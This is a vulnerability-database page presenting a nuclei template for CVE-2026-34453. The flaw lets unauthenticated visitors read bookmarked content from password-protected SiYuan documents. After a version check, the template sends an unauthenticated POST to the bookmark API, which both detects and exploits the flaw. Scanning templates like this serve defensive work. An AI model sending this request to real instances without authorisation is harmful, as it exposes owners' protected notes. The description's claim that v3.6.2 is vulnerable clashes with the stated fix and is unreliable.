Lucene search
K

SiYuan <= v3.6.1 - Bookmark Data Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

SiYuan versions up to 3.6.1 expose bookmark data to unauthenticated visitors via the publish service; update to 3.6.2.

Related
Refs
Code
id: CVE-2026-34453

info:
  name: SiYuan <= v3.6.1 - Bookmark Data Disclosure
  author: 0x_Akoko
  severity: high
  description: |
   SiYuan v3.6.2 contains an information disclosure vulnerability caused by improper authorization checks in the publish service's bookmark filtering, letting unauthenticated visitors access bookmarked blocks from password-protected documents, exploit requires access to the publish service.
  impact: |
   Unauthenticated attackers can access content from protected documents without a password, exposing sensitive information
  remediation: |
   Update to version 3.6.2 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34453
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-34453
    epss-score: 0.01227
    epss-percentile: 0.65221
    cwe-id: CWE-863
  metadata:
    verified: true
    max-request: 2
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,unauth,disclosure,bac

flow: http(1) && http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/system/version"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'compare_versions(ver, ">= 0.0.1", "<= 3.6.1")'
        condition: and

    extractors:
      - type: json
        name: ver
        internal: true
        json:
          - '.data'

  - raw:
      - |
        POST /api/bookmark/getBookmark HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":0'
          - '"type":"bookmark"'
          - '"blocks"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b876f5bc42961087bbe374ff04ea5e72f2ae18f34932e62234b75997ba24818702201a9212105523b9a6637b21c0cd3f27b45ad14a17a473e8097b33aed9065eab2f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Apr 2026 04:37Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.17.5
EPSS0.01227
10